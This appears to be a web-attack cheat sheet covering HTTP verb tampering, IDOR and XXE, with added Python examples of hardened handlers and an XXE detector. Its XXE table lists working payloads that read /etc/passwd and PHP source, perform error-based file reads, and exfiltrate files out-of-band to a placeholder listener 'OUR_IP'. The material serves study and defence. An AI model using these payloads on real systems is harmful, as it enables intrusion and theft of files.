Web Attacks
HTTP Verb Tampering
Other HTTP methods (besides GET and POST) that a server may accept and that per-method access controls often overlook: HEAD, PUT, DELETE, OPTIONS, PATCH
| Command | Description |
|---|---|
| `-X OPTIONS` | Set the HTTP method with curl |
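The reason verb tampering works is that access control is sometimes tied to a list of methods (for example an Apache `<Limit GET POST>` block), so a request using another verb never reaches the check. The following is an added illustration, not code from the original page: a hypothetical route table and two dispatchers, one that authorizes only for GET/POST and one that authorizes first for every verb and then rejects verbs the route does not declare. The paths, sessions and status codes are constructed for the example.

```python
# Added example: per-method access control versus verb-independent authorization.
# Route table and sessions are hypothetical; statuses are plain integers.

# Which verbs each route actually implements (constructed route table).
ALLOWED_METHODS = {"/admin/users": {"GET", "POST", "DELETE"}}
PROTECTED_PREFIXES = ("/admin",)


def _is_authenticated(session):
    """A session is 'logged in' when it carries a user name (constructed model)."""
    return bool(session.get("user"))


def handle_insecure(method, path, session):
    """Mimics a config that only guards GET and POST on /admin: any other verb
    (HEAD, PUT, DELETE, OPTIONS, PATCH) bypasses the authentication check."""
    if path.startswith(PROTECTED_PREFIXES) and method in {"GET", "POST"}:
        if not _is_authenticated(session):
            return 401
    return 200  # handler runs for every other verb, authenticated or not


def handle_hardened(method, path, session):
    """Authorize before looking at the verb, then reject verbs the route does not
    explicitly support with 405. Nothing reaches the handler unauthenticated."""
    if path.startswith(PROTECTED_PREFIXES) and not _is_authenticated(session):
        return 401
    if method not in ALLOWED_METHODS.get(path, set()):
        return 405
    return 200


if __name__ == "__main__":
    anonymous, alice = {}, {"user": "alice"}
    print("insecure DELETE, no session:", handle_insecure("DELETE", "/admin/users", anonymous))
    print("hardened DELETE, no session:", handle_hardened("DELETE", "/admin/users", anonymous))
    print("hardened PATCH, alice:", handle_hardened("PATCH", "/admin/users", alice))
```

The hardened dispatcher makes the method allowlist explicit per route, so an unexpected verb yields 405 rather than silently falling through to a handler; checking authentication before the verb is what closes the bypass.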
Identify IDORs
- In URL parameters & APIs
- In AJAX Calls
- By understanding reference hashing/encoding
- By comparing user roles
| Command | Description |
|---|---|
| `md5sum` | MD5 hash a string |
| `base64` | Base64 encode a string |
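Hashing or encoding an object reference (the `md5sum` and `base64` commands above) only obscures it; it does not establish who may use it, because anyone who understands the scheme can compute the reference for another object. The block below is an added example, not code from the page: a constructed document store, the kind of encoded reference an application might hand out, and a lookup function written twice, once without and once with a server-side ownership/role check. Users, roles and document titles are invented for the illustration.

```python
# Added example: why encoded references are not authorization, and what an
# object-level authorization check looks like. All data below is constructed.
import base64
import hashlib

# Constructed sample data: document owners and user roles.
DOCUMENTS = {
    1: {"owner": "alice", "title": "alice-q1-report"},
    2: {"owner": "bob", "title": "bob-contract"},
}
ROLES = {"alice": "user", "bob": "user", "carol": "admin"}


def encode_reference(doc_id):
    """The reference the app exposes: base64 of the MD5 hex digest of the id.
    This is obfuscation only; md5(str(other_id)) is trivial to compute."""
    digest = hashlib.md5(str(doc_id).encode()).hexdigest()
    return base64.b64encode(digest.encode()).decode()


def decode_reference(ref):
    """Undo the encoding layer to show the MD5 digest it wraps."""
    return base64.b64decode(ref).decode()


# Reverse index so a reference can be resolved to a document id.
REFERENCE_INDEX = {encode_reference(i): i for i in DOCUMENTS}


def fetch_insecure(ref, current_user):
    """Resolves the reference and returns the document to whoever presents it."""
    doc_id = REFERENCE_INDEX.get(ref)
    if doc_id is None:
        return 404, None
    return 200, DOCUMENTS[doc_id]["title"]


def fetch_hardened(ref, current_user):
    """Same lookup, but the caller must own the object or hold the admin role.
    The check uses the server's own record of ownership, never client input."""
    doc_id = REFERENCE_INDEX.get(ref)
    if doc_id is None:
        return 404, None
    doc = DOCUMENTS[doc_id]
    if doc["owner"] != current_user and ROLES.get(current_user) != "admin":
        return 403, None
    return 200, doc["title"]


if __name__ == "__main__":
    ref = encode_reference(2)
    print("reference for doc 2:", ref, "wraps", decode_reference(ref))
    print("insecure, alice:", fetch_insecure(ref, "alice"))
    print("hardened, alice:", fetch_hardened(ref, "alice"))
```

Comparing `fetch_hardened` across two accounts of the same role (the "comparing user roles" bullet) is exactly the test a reviewer would run: the same reference should return 200 for the owner and 403 for another ordinary user.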
XXE
| Code | Description |
|---|---|
| `<!ENTITY xxe SYSTEM "http://localhost/email.dtd">` | Define an external entity that points to a URL |
| `<!ENTITY xxe SYSTEM "file:///etc/passwd">` | Define an external entity that points to a file path |
| `<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">` | Read PHP source code through the base64-encode filter |
| `<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">` | Read a file through a PHP error message (error-based XXE) |
| `<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">` | Read a file via out-of-band (OOB) exfiltration to a listener at `OUR_IP` |
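Every row in the table depends on the parser accepting a DTD with entity declarations, so the mitigation that covers all of them at once is to refuse DTDs before parsing. The block below is an added example rather than code from the page: a pre-parse gate in front of Python's standard-library XML parser, plus a small indicator scanner a defender can run over request bodies or logs to flag the entity targets the table lists. The two request bodies are constructed samples.

```python
# Added example: rejecting DTD/entity declarations before XML parsing, and
# flagging the entity targets listed in the XXE table. Sample bodies are constructed.
import re
import xml.etree.ElementTree as ET

# Constructed sample request bodies.
BENIGN = b"<?xml version='1.0'?><email><to>a@example.com</to></email>"
MALICIOUS = (
    b"<?xml version='1.0'?>"
    b"<!DOCTYPE email [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
    b"<email><to>&xxe;</to></email>"
)

# Any DOCTYPE or ENTITY declaration is refused; well-formed application XML
# exchanged over an API has no legitimate need for either.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


class DtdRejected(ValueError):
    """Raised when a document carries a DTD or entity declaration."""


def safe_to_parse(body):
    """True when the body contains no DTD/entity declaration."""
    return DOCTYPE_RE.search(body) is None


def parse_safely(body):
    """Gate, then parse. Dropping the DTD removes the whole entity-expansion
    surface, including the error-based and out-of-band variants above."""
    if not safe_to_parse(body):
        raise DtdRejected("DTD/entity declarations are not accepted")
    return ET.fromstring(body)


def xxe_indicators(body):
    """Detection helper: names of the risky entity patterns present in a body."""
    patterns = {
        "external_entity": rb"<!ENTITY[^>]*SYSTEM",   # SYSTEM entity, any scheme
        "parameter_entity": rb"<!ENTITY\s+%",         # parameter entities (error/OOB)
        "file_scheme": rb"file://",                   # local file read
        "php_filter": rb"php://filter",               # PHP source disclosure
    }
    return sorted(name for name, pat in patterns.items()
                  if re.search(pat, body, re.IGNORECASE))


if __name__ == "__main__":
    print("benign parses to:", parse_safely(BENIGN).find("to").text)
    print("malicious accepted?", safe_to_parse(MALICIOUS))
    print("indicators:", xxe_indicators(MALICIOUS))
```

The gate is deliberately crude (a byte-level search rather than a parser option) so that it does not depend on which XML library, or which version of it, ends up behind the endpoint; if the deployment uses a parser that offers a "no DTD" switch, set that as well.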